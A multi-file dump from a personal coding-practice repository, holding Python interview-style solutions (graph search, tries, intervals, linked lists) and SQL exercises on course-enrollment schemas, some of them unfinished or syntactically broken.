"text": "-- Any user who has registered\nCREATE TABLE users AS (\n user_id INTEGER,\n email VARCHAR,\n PRIMARY KEY (user_id)\n);\n-- Any user who has enrolled in a course\nCREATE TABLE enrollments AS (\n user_id INTEGER,\n course_id INTEGER,\n PRIMARY KEY (user_id, course_id)\n);\nCREATE TABLE courses_universities AS (\n course_id INTEGER,\n university_id INTEGER,\n PRIMARY KEY (course_id, university_id)\n);\n\n\n\nSELECT COUNT(1) --200\nFROM enrollments;\n\nSELECT COUNT(1) -- 240\nFROM enrollments AS e\nJOIN courses_universities AS cu\n ON e.course_id = cu.course_id\n;\n\n\n--Enrollments by university\n\nSELECT university_id, COUNT(user_id)\nFROM enrollments JOIN courses_universities\nON enrollments.course_id = courses_universities.course_id\nGROUP BY university_id\n\n\n--number of enrollments by user\n\nSELECT user_id, COUNT(course_id) FROM enrollments\nGROUP BY user_id\n\n--overall average number of enrollments\n\nSELECT CAST(COUNT(course_id IS NOT NULL), FLOAT)/CAST(COUNT(DISTINCT user_id), FLOAT) * 100.00\nFROM users LEFT JOIN enrollments\nON users.user_id = enrollments.user_id\n\n\n--list the users who have not enrolled\n\nSELECT DISTINCT user_id FROM users WHERE user_id NOT IN (SELECT DISTINCT user_id FROM enrollments)\n\n--total count of users who have not enrolled\n\nSELECT COUNT(user_id) FROM users\nWHERE user_id NOT IN (SELECT DISTINCT user_id FROM enrollments)\n\n\n--overall % of users who have not enrolled in a course\n\nSELECT CAST(COUNT(course_id IS NULL), FLOAT)/CAST(COUNT(*), FLOAT) * 100.00\nFROM users LEFT JOIN enrollments\nON users.user_id = enrollments.user_id\n"
},
{
"alpha_fraction": 0.4272445738315582,
"alphanum_fraction": 0.4721362292766571,
"avg_line_length": 22.925926208496094,
"blob_id": "f3c34a9be5d7a53db5b79ae8baa5bf61cb787ffb",
"content_id": "107fc0ecfcd6797229b134828b025a2eced3411b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1292,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 54,
"path": "/number_of_islands.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\nGiven an m x n 2d grid map of '1's (land) and '0's (water), return the number of islands.\n\nAn island is surrounded by water and is formed by connecting adjacent lands horizontally or vertically.\nYou may assume all four edges of the grid are all surrounded by water.\n\nExample 1:\n\nInput: grid = [\n [\"1\",\"1\",\"1\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"0\",\"0\"],\n [\"0\",\"0\",\"0\",\"0\",\"0\"]\n]\nOutput: 1\nExample 2:\n\nInput: grid = [\n [\"1\",\"1\",\"0\",\"0\",\"0\"],\n [\"1\",\"1\",\"0\",\"0\",\"0\"],\n [\"0\",\"0\",\"1\",\"0\",\"0\"],\n [\"0\",\"0\",\"0\",\"1\",\"1\"]\n]\nOutput: 3\n\n'''\n\n\nclass Solution(object):\n def numIslands(self, grid):\n \"\"\"\n :type grid: List[List[str]]\n :rtype: int\n \"\"\"\n islands = 0\n\n for i, raw in enumerate(grid):\n for j, col in enumerate(raw):\n\n if(grid[i][j] == '1'):\n islands += 1\n self.flood_bfs(i,j, grid)\n\n return islands\n\n def flood_bfs(self, i, j, grid):\n if i < 0 or i >= len(grid) or j < 0 or j >= len(grid[i]) or grid[i][j] == '0':\n return\n else:\n grid[i][j] = '0'\n self.flood_bfs( i+1, j, grid)\n self.flood_bfs( i-1, j, grid)\n self.flood_bfs( i, j+1, grid)\n self.flood_bfs( i, j-1, grid)\n"
},
{
"alpha_fraction": 0.6601941585540771,
"alphanum_fraction": 0.6650485396385193,
"avg_line_length": 21.88888931274414,
"blob_id": "b4b7f50edb7173e67fed5b8754ecea91d9012cdd",
"content_id": "5c596cf110a97d5f3048c178985723cc2c7b5227",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 206,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 9,
"path": "/reverseString.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "def reverse_words(sentence): # sentence here is an array of characters\n\n word_list = sentence.split()\n rev = word_list[::-1]\n ret = ' '.join(rev)\n\n return ret\n\nprint(reverse_words('We love Python'))\n"
},
{
"alpha_fraction": 0.3757094144821167,
"alphanum_fraction": 0.39727583527565,
"avg_line_length": 20.487804412841797,
"blob_id": "c8be0debcb1bf5e89cf286974a009ea25689e8c0",
"content_id": "c2598d8ce87f4bfb16e96a05b1205e7728d79883",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 881,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 41,
"path": "/TreasureIsland.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "map=[\n ['0', 'O', 'O', 'O'],\n ['O', 'O', 'O', 'O'],\n ['D', 'O', 'O', 'O'],\n ['X', 'O', 'D', 'O']]\n\nprint(map)\n\n\n\ndef TresureIsland(map):\n\n if not map:\n return -1\n\n TREASURE, DANGER, SAFE, VISITED = 'X', 'D', 'O', 'V'\n\n queue = [(0,0)]\n steps = 0\n\n while queue:\n queue_temp = []\n for x, y in queue:\n for x_dif, y_dif in [[0,1],[0,-1],[1,0],[-1,0]]:\n cur_x = x + x_dif\n cur_y = y + y_dif\n\n if 0 <= cur_x < len(map) and 0 <= cur_y < len(map[0]):\n if map[cur_x][cur_y] == TREASURE:\n return steps + 1\n if map[cur_x][cur_y] == SAFE:\n queue_temp.append((cur_x,cur_y))\n map[x][y] = VISITED\n steps +=1\n queue = queue_temp\n return -1\n\n\n#print (min_steps(map))\n\nprint(TresureIsland(map))\n"
},
{
"alpha_fraction": 0.5920826196670532,
"alphanum_fraction": 0.5966724157333374,
"avg_line_length": 21.063291549682617,
"blob_id": "e8cf1aa1068d451eecc5611f68ffc3775935b6fa",
"content_id": "37fa74d744fe1703c1b5629a3123d59f0839e245",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1743,
"license_type": "no_license",
"max_line_length": 186,
"num_lines": 79,
"path": "/alphabet.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\nWrite a function that returns whether a list of strings is sorted given a specific alphabet.\nA list of N words and the K-sized alphabet are given.\n\ninput: words = [ \"cat\", \"catt\", \"cbt\", \"bat\", \"tab\"]\n alphabet = ['c', 'b', 'a', 't']\noutput: True\n\n'''\n\ndef sortedWords(words, alphabet):\n\n if len(words) <= 1:\n return True\n\n if len(alphabet) == 0:\n return True\n\n prevWord = words[0]\n\n\n for index in range(1: len(words)- 2):\n curWord = words[index]\n\n for position, character in enumerate(prevWord):\n\n if position > len(curWord) -1:\n return False\n\n if character not in alphabet:\n return False\n\n if alphabet.index(character) < alphabet.index(prevWord[position]:\n return False\n\n if alphabet.index(character) > alphabet.index(prevWord[position]:\n break\n\n prevWord = curWord\n\n\n return True\n\n\n# tests\n\nwords = [\"cat\", \"cbt\", \"bat\", \"tab\"]\nalphabet = ['c', 'b', 'a', 't']\n\n\nprint(sortedWords(words, alphabet)) #False\n\n\n\n\n'''\nGiven a string with alpha-numeric characters and parentheses, return a string with balanced parentheses by removing the fewest characters possible. You cannot add anything to the string.\nBalanced parentheses means that each opening parenthesis has a corresponding closing parenthesis and the pairs of parentheses are properly nested.\n\n\n'aaa(bb)c(aa)aa(a'\n'aaa(bb)c(aa)aaa'\n\n'''\n\n[('(', 9) ]\n\ndef replaceParentheses( string):\n\n\n stack = []\n for index, char in enumerate(string):\n\n if char == '(':\n stack.append(('(', index))\n\n if char == ')':\n if stack[len(stack)][0] == '(':\n stack.pop(len(stack))\n"
},
{
"alpha_fraction": 0.5530303120613098,
"alphanum_fraction": 0.5984848737716675,
"avg_line_length": 15.375,
"blob_id": "db31dbce19c6780467ffa1e22d8fbe6647c3e5c2",
"content_id": "5bd9b26e68d66fe2f06ecbea016a0e1874dcf1a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 132,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 8,
"path": "/repeatNum.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "\n'''\n Find the non repeated number in an array\n'''\narr = [1, 5, 8, 1, 8]\nresult = 0\nfor num in arr:\n result ^= num\n print(result)\n"
},
{
"alpha_fraction": 0.5569972395896912,
"alphanum_fraction": 0.6033363938331604,
"avg_line_length": 26.66666603088379,
"blob_id": "bfa44b13f8f9c5c4271523a79bfa6456417e60da",
"content_id": "7228182e63a603a83d695d63659989765a133152",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1079,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 39,
"path": "/merge_intervals.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\nGiven an array of intervals where intervals[i] = [starti, endi], merge all overlapping intervals,\nand return an array of the non-overlapping intervals that cover all the intervals in the input.\n\n\nExample 1:\n\nInput: intervals = [[1,3],[2,6],[8,10],[15,18]]\nOutput: [[1,6],[8,10],[15,18]]\nExplanation: Since intervals [1,3] and [2,6] overlaps, merge them into [1,6].\nExample 2:\n\nInput: intervals = [[1,4],[4,5]]\nOutput: [[1,5]]\nExplanation: Intervals [1,4] and [4,5] are considered overlapping.\n\n'''\n\nclass Solution(object):\n def merge(self, intervals):\n \"\"\"\n :type intervals: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n\n\n if len(intervals) == 0: return []\n\n intervals = sorted(intervals, key=lambda x: x[0])\n merged_intervals = [intervals[0]]\n\n for session in intervals[1:]:\n if session[0] <= merged_intervals[-1][1]:\n merged_intervals[-1][1] = max(merged_intervals[-1][1], session[1])\n else:\n merged_intervals.append(session)\n\n\n return merged_intervals\n"
},
{
"alpha_fraction": 0.7514106631278992,
"alphanum_fraction": 0.7551724314689636,
"avg_line_length": 31.212121963500977,
"blob_id": "c5dae68c288cc7f20956114843c7af4559f00338",
"content_id": "ef428b8e41b1b6d2af9e928490c1ac2a2cf8eedb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 3190,
"license_type": "no_license",
"max_line_length": 151,
"num_lines": 99,
"path": "/data_model.ddl",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "\n'''Creating Tables'''\n\nCREATE OR REPLACE TABLE data.Users (\n user_id INT64 NOT NULL, # primary_key\n first_name STRING,\n last_name STRING,\n email STRING,\n gender STRING,\n join_date DATE,\n country STRING,\n city STRING,\n language STRING\n)\n\nCREATE OR REPLACE TABLE data.Courses (\n course_id STRING NOT NULL, # primary_key\n instructor_id STRING NOT NULL, # forign key to instructors table\n title STRING,\n description STRING,\n)\n\nCREATE OR REPLACE TABLE data.Instructors (\n instructor_id INT64 NOT NULL, # primary_key\n first_name STRING,\n last_name STRING,\n email STRING,\n institution STRING,\n bio STRING,\n join_date DATE\n)\n\nCREATE OR REPLACE TABLE data.Modules (\n course_id STRING NOT NULL, # super_key, forign key to courses table\n module_id STRING NOT NULL, # super_key\n module_order INT64,\n module_description STRING,\n)\n\nCREATE OR REPLACE TABLE data.Items (\n module_id STRING NOT NULL, # super_key, forign key to modules table\n item_id STRING NOT NULL, # super_key\n item_type STRING,\n item_week STRING,\n item_order INT64,\n item_content STRING,\n)\n\nCREATE OR REPLACE TABLE data.Offerings (\n course_id STRING NOT NULL, # super_key, forign key to courses table\n start_date DATE NOT NULL, # super_key\n end_date DATE,\n)\n\n\nCREATE OR REPLACE TABLE data.Registrations (\n user_id INT64 NOT NULL, # super_key, forign key to users table\n course_id STRING NOT NULL, # super_key, forign key to courses table\n registration_date DATE,\n completion_date DATE\n)\n\nCREATE OR REPLACE TABLE data.Activity (\n user_id INT64 NOT NULL, # super_key, forign key to users table\n course_id STRING NOT NULL, # super_key, forign key to courses table\n module_id STRING NOT NULL, # super_key, forign key to modules table\n item_id STRING NOT NULL, # super_key, forign key to items table\n activity_type STRING, # ex: start, complete, view\n activity_ts TIMESTAMP\n)\n\n'''Load raw data from course_funnel_assignment.csv to course-funnel-assignment.data.raw_data first.\nThen insert results of each of below query to populate the tables'''\n\n# populate Users table\nSELECT DISTINCT user_id FROM course-funnel-assignment.data.raw_data\n\n# populate Courses table\nSELECT DISTINCT course_id FROM course-funnel-assignment.data.raw_data\n\n# populate Modules table\nSELECT DISTINCT course_id, module_id, module_order FROM course-funnel-assignment.data.raw_data\n\n# populate Items table\nSELECT DISTINCT module_id , item_id FROM course-funnel-assignment.data.raw_data\n\n# populate Offerings table\nSELECT course_id, MIN(DATE(item_start_ts)) AS start_date , MAX(DATE( item_complete_ts )) AS end_date\nFROM course-funnel-assignment.data.raw_data\nGROUP BY course_id\n\n# populate Registrations table\nSELECT user_id, course_id, MIN(DATE(item_start_ts)) AS registration_date FROM course-funnel-assignment.data.raw_data\nGROUP BY user_id, course_id\n\n# populate Activity table\nSELECT user_id, course_id, item_id, module_id, item_start_ts AS activity_ts, 'start' AS activity_type FROM course-funnel-assignment.data.raw_data\nUNION ALL\nSELECT user_id, course_id, item_id, module_id, item_complete_ts AS activity_ts, 'complete' AS activity_type FROM course-funnel-assignment.data.raw_data\nWHERE item_complete_ts IS NOT NULL\n"
},
{
"alpha_fraction": 0.4867967963218689,
"alphanum_fraction": 0.5407577753067017,
"avg_line_length": 17.53191566467285,
"blob_id": "341cc520ad2f1641a3fe0a247f3849612f1d1468",
"content_id": "b8caa49349700b7b7b5f81f1c8271ba0475b69b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 871,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 47,
"path": "/number_pad_recursion.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "a = [4, 6, 3,3,3,3,9]\n\n\nmapping = { 2:['A','B','C'], 3: ['D','E','F'], 9:['W','X', 'Y', 'Z'] }\n\n\ndef rec_function( letters , numbers):\n if numbers == []:\n print(''.join(letters))\n return\n\n digit = numbers[0]\n\n #print(mapping[digit][0])\n\n #print(letters)\n #print(numbers)\n\n l1 = letters[:]\n l2 = letters[:]\n l3 = letters[:]\n l1.append(mapping[digit][0])\n l2.append(mapping[digit][1])\n l3.append(mapping[digit][2])\n\n #print(l1)\n #print(l2)\n #print(l3)\n\n if digit == 7 or digit == 9:\n l4 = letters[:]\n l4.append(mapping[digit][3])\n\n #print(l4)\n\n rec_function(l1, numbers[1:])\n rec_function(l2, numbers[1:])\n rec_function(l3, numbers[1:])\n rec_function(l4, numbers[1:])\n\n else:\n rec_function(l1, numbers[1:])\n rec_function(l2, numbers[1:])\n rec_function(l3, numbers[1:])\n\n\nrec_function([], [2,9,3])\n"
},
{
"alpha_fraction": 0.5399113297462463,
"alphanum_fraction": 0.5709534287452698,
"avg_line_length": 22.128204345703125,
"blob_id": "ec6a11f85649f0df167df80c7946ec221d0a3bed",
"content_id": "b5c833bc3cfbe4852ac4e3488fee9671b0dfdcd5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 902,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 39,
"path": "/merge_linklist.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\nMerge two sorted linked lists\nGiven two sorted linked lists, merge them so that the resulting linked list is also sorted.\nConsider two sorted linked lists and the merged list below them as an example.\n'''\n\n\ndef merge_sorted(head1, head2):\n #TODO: Write - Your - Code\n newHead = None\n\n while head1 or head2:\n if head1 and head2:\n if head1.data > head2.data:\n if newHead == None:\n newHead = head2\n cur = newHead\n else:\n cur.next = head2\n cur = head2\n head2 = head2.next\n else:\n if newHead == None:\n newHead = head1\n cur = head1\n else:\n cur.next = head1\n cur = head1\n head1 = head1.next\n elif head1 is None:\n cur.next = head2\n cur = head2\n head2 = head2.next\n else:\n cur.next = head1\n cur = head1\n head1 = head1.next\n\n return newHead\n"
},
{
"alpha_fraction": 0.6004902124404907,
"alphanum_fraction": 0.6397058963775635,
"avg_line_length": 23,
"blob_id": "97de972343be2e61c10ad5a9ab197807bb1886de",
"content_id": "5d609e04070dd1445c9d317e4e97bca4a0451ffd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 818,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 34,
"path": "/levelordertree.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\nLevel Order Traversal of Binary Tree\nGiven the root of a binary tree, display the node values at each level.\n Node values for all levels should be displayed on separate lines. Let’s take a look at the below binary tree.\n\n100\n50\n200\n25\n75\n350\nLevel order traversal for this tree should look like: 100; 50, 200; 25, 75, 350\n'''\n\ndef level_order_traversal(root):\n result = \"\"\n #TODO: Write - Your - Code\n if root is None:\n return result\n\n queue = [root]\n result += str(root.data) + \" \"\n\n while len(queue) != 0:\n size = len(queue)\n for i in range(size):\n node = queue.pop(0)\n\n if node.left is not None:\n result += str(node.left.data) + \" \"\n queue.append(node.left)\n if node.right is not None:\n result += str(node.right.data) + \" \"\n queue.append(node.right)\n"
},
{
"alpha_fraction": 0.7080972790718079,
"alphanum_fraction": 0.7370876669883728,
"avg_line_length": 43.791046142578125,
"blob_id": "24a5bf0b73aca0c58df82d6534c6149fbfc7978f",
"content_id": "3852793ed45a209431734409d5017ce5785530fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 3001,
"license_type": "no_license",
"max_line_length": 173,
"num_lines": 67,
"path": "/course_funnel.sql",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "SELECT\n *\n FROM\n UNNEST(GENERATE_DATE_ARRAY('2016-01-01', '2016-12-31', INTERVAL 1 DAY)) AS example\n\n\n WITH dates AS (\nSELECT date FROM UNNEST(GENERATE_DATE_ARRAY('2016-01-01', '2016-12-31', INTERVAL 1 DAY)) AS date),\n\nWeekly_Course_Actives AS (\nSELECT dates.date, course_id, COUNT(DISTINCT user_id) AS Weekly_Course_Actives FROM `course-funnel-assignment.data.raw_data` JOIN dates\nON DATE(item_start_ts) >= DATE_SUB(dates.date, INTERVAL 6 DAY) AND DATE(item_start_ts) <= dates.date\nGROUP BY dates.date, course_id\nORDER BY dates.date, course_id )\n\n\n\n'''\nans #b\nSELECT started_cur_7_day.date, started_cur_7_day.course_id, COUNT(DISTINCT started_cur_7_day.user_id) FROM started_cur_7_day JOIN started_prev_7_day\nON started_cur_7_day.date = started_prev_7_day.date AND started_cur_7_day.course_id = started_prev_7_day.course_id AND started_cur_7_day.user_id = started_prev_7_day.user_id\nGROUP BY started_cur_7_day.date, started_cur_7_day.course_id\nORDER BY started_cur_7_day.date, started_cur_7_day.course_id\n'''\n\n'''\nans #c\nSELECT started_cur_7_day.date, started_cur_7_day.course_id, COUNT(DISTINCT started_cur_7_day.user_id) FROM started_cur_7_day JOIN completed_modules_in_past\nON started_cur_7_day.date = completed_module_in_past.date AND started_cur_7_day.course_id = completed_modules_in_past.course_id\n AND started_cur_7_day.user_id = completed_modules_in_past.user_id AND started_cur_7_day.module_id != completed_modules_in_past.module_id\nGROUP BY started_cur_7_day.date, started_cur_7_day.course_id\nORDER BY started_cur_7_day.date, started_cur_7_day.course_id\n'''\n\n'''\n#passed the course\nSELECT dates.date, course_id, module_id, user_id FROM completed_modules_in_past JOIN dates\nON DATE(item_start_ts) >= DATE_SUB(dates.date, INTERVAL 6 DAY) AND DATE(item_start_ts) <= dates.date\nGROUP BY dates.date, course_id, module_id, user_id\nORDER BY dates.date, course_id, module_id, user_id\n'''\n\n\n\nWITH dates AS (\nSELECT date FROM UNNEST(GENERATE_DATE_ARRAY('2016-01-01', '2016-12-31', INTERVAL 1 DAY)) AS date),\n\nstarted_cur_7_day AS (\nSELECT dates.date, course_id, module_id, user_id FROM `course-funnel-assignment.data.raw_data` JOIN dates\nON DATE(item_start_ts) >= DATE_SUB(dates.date, INTERVAL 6 DAY) AND DATE(item_start_ts) <= dates.date\nGROUP BY dates.date, course_id, module_id, user_id\nORDER BY dates.date, course_id, module_id, user_id ),\n\n\nstarted_prev_7_day AS (\nSELECT dates.date, course_id, user_id FROM `course-funnel-assignment.data.raw_data` JOIN dates\nON DATE(item_start_ts) >= DATE_SUB(dates.date, INTERVAL 13 DAY) AND DATE(item_start_ts) <= DATE_SUB(dates.date, INTERVAL 7 DAY)\nGROUP BY dates.date, course_id, user_id\nORDER BY dates.date, course_id, user_id)#,\n\n#completed_modules_in_past AS (\nSELECT dates.date, course_id, module_id, user_id, FROM `course-funnel-assignment.data.raw_data` JOIN dates\nON DATE(item_complete_ts) <= dates.date\nGROUP BY dates.date, course_id, module_id, user_id\nHAVING COUNT(item_id) >= 4\nORDER BY dates.date, course_id, module_id, user_id\n#)\n"
},
{
"alpha_fraction": 0.5285451412200928,
"alphanum_fraction": 0.5745856165885925,
"avg_line_length": 23.68181800842285,
"blob_id": "6d0de0b16f8e047dd32be7eb3a31cfea1a61e3b5",
"content_id": "ef50964e818fb7922e67770ef063f94640777727",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 543,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 22,
"path": "/binary_search.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "def binary_search(input_array, value):\n \"\"\"Your code goes here.\"\"\"\n\n low = 0\n high = len(input_array) - 1\n\n while low <= high:\n middle = (low + high)/2\n\n if input_array[middle] == value:\n return middle\n elif input_array[middle] < value:\n low = middle + 1\n elif input_array[middle] > value:\n high = middle - 1\n return -1\n\ntest_list = [1,3,9,11,15,19,29]\ntest_val1 = 25\ntest_val2 = 15\nprint binary_search(test_list, test_val1)\nprint binary_search(test_list, test_val2)\n"
},
{
"alpha_fraction": 0.3512820601463318,
"alphanum_fraction": 0.5269230604171753,
"avg_line_length": 17.571428298950195,
"blob_id": "4bc08527dc7d62a36e3ee63642dcb9b84112d49a",
"content_id": "7dafb97ee752b5f10c382de3ac7e5c95c6007557",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 780,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 42,
"path": "/sumStrings.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\nInput : str1 = \"3333311111111111\",\n str2 = \"44422222221111\"\nOutput : 3377733333332222\n\n'''\ndef sumStrings(str1, str2):\n str1 = str1[::-1]\n str2 = str2[::-1]\n\n str_sum = \"\"\n sum = 0\n digit = 0\n carry = 0\n\n\n while len(str1) > 0 or len(str2) > 0:\n num1 = str1[:1]\n num2 = str2[:1]\n str1 = str1[1:]\n str2 = str2[1:]\n\n\n int_num1 = int(num1) if num1 else 0\n int_num2 = int(num2) if num2 else 0\n\n sum = int_num1 + int_num2 + carry\n\n digit = sum%10\n carry = sum//10\n\n str_sum = str_sum + str(digit)\n\n\n if carry != 0:\n str_sum = str_sum + str(carry)\n\n return str_sum[::-1]\n\n\nresult = sumStrings(\"3333311111111111\",\"44422222221111\")\nprint(result) # '3377733333332222'\n"
},
{
"alpha_fraction": 0.43677374720573425,
"alphanum_fraction": 0.4736842215061188,
"avg_line_length": 20.8358211517334,
"blob_id": "e5b98535894318e5a7404015b19d598d4e138b5f",
"content_id": "5b32fbf521e4f143e0659a990a66e75a16a56431",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1463,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 67,
"path": "/game_of_life.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "# gol\n\n'''\nImplement game of life -> https://en.wikipedia.org/wiki/Conway%27s_Game_of_Life\n\n'''\n\nimport random\n\nMAX_COL = 25\nMAX_ROW = 40\n\n\nmatrix = [[0 for i in range(MAX_COL)] for j in range(MAX_ROW)]\nnew_matrix = [[0 for i in range(MAX_COL)] for j in range(MAX_ROW)]\n\n\nfor i in range(MAX_ROW):\n for j in range(MAX_COL):\n matrix[i][j] = random.randint(0,1)\n\ndef printGrid(matrix):\n for i in range(MAX_ROW):\n print(matrix[i])\n\nprintGrid(matrix)\n\ndef getsum(grid, x, y):\n\n # (0 - 1 + 10) % 10 => 9\n # (9 + 1 + 10) % 10 => 0\n\n sum = 0\n for i in [-1,0,1]:\n for j in [-1,0,1]:\n sum += matrix[(x + i + 10) % 10][(y + j + 10) % 10]\n\n return sum\n\ndef getNextGen(matrix):\n for i in range(MAX_ROW):\n for j in range(MAX_COL):\n sum = getsum(matrix, i, j)\n\n # rule #1\n if (matrix[i][j] and sum < 2):\n new_matrix[i][j] = 0\n # rule #2\n elif (matrix[i][j] and (sum == 2 or sum ==3)):\n new_matrix[i][j] = 1\n # rule #3\n elif (matrix[i][j] and sum > 3):\n new_matrix[i][j] = 0\n # rule #4\n elif (not matrix[i][j] and sum == 3):\n new_matrix[i][j] = 1\n\n else:\n new_matrix[i][j] = matrix[i][j]\n\n return new_matrix\n\n\nfor i in range(10):\n print('\\n-------------------------\\n')\n matrix = getNextGen(matrix)\n printGrid(matrix)\n"
},
{
"alpha_fraction": 0.6965853571891785,
"alphanum_fraction": 0.7248780727386475,
"avg_line_length": 25.230770111083984,
"blob_id": "b2bdbe671df0d12b52b1c840a757c4fb5c08a126",
"content_id": "6292e5e7e42270acb2cee958fedf09c89add4ba2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 1025,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 39,
"path": "/course_experiment.sql",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "\n\nTables\n\ncourses\n\"course_id\",\"class_size\"\n\ncourse_ownership\n\"course_id\",\"prof_id\"\n\nexperiments\n\"experiment_id\",\"course_id\"\n\nprofessors\n\"prof_id\",\"name\",\"email\",\"created_at\",\"is_tophat\"\n\nresponses\n\"response_id\",\"created_at\",\"course_id\",\"response\",\"correct\"\n\n\nWITH experiment_courses AS (\n SELECT experiment_id, course_id FROM experiments\n WHERE experiment_id = '257'\n)\n\ncorrect_responses_test AS (\n SELECT experiment_id, correct FROM responses JOIN experiment_courses ON responses.course_id = experiment_courses.course_id\n WHERE DATE(created_at) >= DATE('2019-3-1') AND DATE(created_at) <= ('2019-5-1')\n)\n\n\ncorrect_responses_control AS (\n SELECT experiment_id, correct FROM responses\n WHERE DATE(created_at) >= DATE('2019-3-1') AND DATE(created_at) <= ('2019-5-1')\n AND responses.course_id NOT IN (SELECT course_id FROM experiment_courses)\n\n)\n\nSELECT CAST( COUNT(CASE WHEN correct = 'TRUE' THEN 1 ELSE 0 END), FLOAT) / CAST( COUNT(*), FLOAT) AS correct_percentage\nFROM correct_responses_test\nGROUP BY experiment_id\n"
},
{
"alpha_fraction": 0.5838621854782104,
"alphanum_fraction": 0.5883952975273132,
"avg_line_length": 22.46808433532715,
"blob_id": "fa081ccd8081f5c3319f482b7d8abd7415d8e757",
"content_id": "b0ba6cc901650da355beae054ae9a30148df9c86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1103,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 47,
"path": "/max_depth_tree.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\nGiven a binary tree, find its maximum depth.\n\nThe maximum depth is the number of nodes along the longest path from the root node down to the farthest leaf node.\n\nNote: A leaf is a node with no children.\n\n'''\n\n\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution(object):\n\n depth = []\n\n def maxDepth_helper(self, root, cur_d):\n\n if root.left is None and root.right is None:\n self.depth.append(cur_d)\n return\n\n elif root.left is not None and root.right is None:\n self.maxDepth_helper(root.left, cur_d += 1)\n\n elif root.right is not None and root.left is None:\n self.maxDepth_helper(root.right, cur_d += 1)\n\n else:\n self.maxDepth_helper(root.left, cur_d += 1)\n self.maxDepth_helper(root.right, cur_d += 1)\n\n\n def maxDepth(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n self.maxDepth_helper(root, 0)\n\n return max(depth)\n"
},
{
"alpha_fraction": 0.506486177444458,
"alphanum_fraction": 0.506486177444458,
"avg_line_length": 20.88888931274414,
"blob_id": "2447faa91729e59fc4da2d1b85ebbe7874e02811",
"content_id": "d84fbde22db075753fa4e78e18cdf88bce4164da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1773,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 81,
"path": "/search.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "#\n# dictionary=['pin', 'pinner', 'present']\n# query='pi'\n# results=['pin', 'pinner']\n#\n\nclass Node(object):\n def __init__(self, value, end):\n self.value = value\n self.end = end\n self.next = {}\n\nclass Dictionary(object):\n def __init__(self):\n self.head = Node(None, False)\n\n def addWord(self, word):\n\n if word is None or word == '':\n return\n\n cur = self.head\n for char in word:\n if char not in cur.next:\n newNode = Node(char, False)\n cur.next[char] = newNode\n\n cur = cur.next[char]\n\n cur.end = True\n\n def __searchHelper(self, word, cur, results):\n\n if cur.end == True:\n results.append(word)\n\n if cur.next.keys() == []:\n return\n\n for key, node in cur.next.items():\n self.__searchHelper(word + node.value, cur.next[key], results)\n\n def search(self, query):\n if query is None or query == '':\n return None\n\n cur = self.head\n\n word = ''\n for char in query:\n if char in cur.next:\n word += char\n cur = cur.next[char]\n else:\n return []\n\n results = []\n self.__searchHelper(word, cur, results)\n return results\n\n def __printHelper(self, 